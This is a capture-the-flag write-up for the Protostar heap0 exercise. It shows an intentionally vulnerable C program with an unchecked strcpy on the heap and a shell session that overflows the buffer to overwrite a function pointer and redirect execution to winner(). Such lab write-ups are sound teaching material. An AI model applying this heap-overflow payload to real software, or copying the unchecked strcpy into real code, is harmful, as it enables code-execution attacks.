Protostar vm, heap0

protostar

Here is the source of the vulnerable program :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>
#include <sys/types.h>

struct data {
  char name[64];
};

struct fp {
  int (*fp)();
};

void winner()
{
  printf("level passed\n");
}

void nowinner()
{
  printf("level has not been passed\n");
}

int main(int argc, char **argv)
{
  struct data *d;
  struct fp *f;

  d = malloc(sizeof(struct data));
  f = malloc(sizeof(struct fp));
  f->fp = nowinner;

  printf("data is at %p, fp is at %p\n", d, f);

  strcpy(d->name, argv[1]);
  
  f->fp();

}

This challenge is a basic heap overflow. It’s the same idea as a stack based buffer overflow. We’ll have to overwrite the fp pointer with the name variable of the data struct. First let’s see where both of those variables are in the heap.

1
2
3
4
5
6
user@protostar:~$ /opt/protostar/bin/./heap0 aaaa
data is at 0x804a008, fp is at 0x804a050
level has not been passed
user@protostar:~$ python -c 'print 0x804a050-0x804a008'
72
user@protostar:~$

Then it’s the same principle as a stack based buffer overflow, we get the right addrress to write in fp and we test the exploit.

1
2
3
4
5
6
7
user@protostar:~$ objdump -t /opt/protostar/bin/heap0 | grep winner
08048464 g     F .text	00000014              winner
08048478 g     F .text	00000014              nowinner
user@protostar:~$ /opt/protostar/bin/./heap0 $(python -c 'print 72*"a"+"\x64\x84\x04\x08"')
data is at 0x804a008, fp is at 0x804a050
level passed
user@protostar:~$

Done.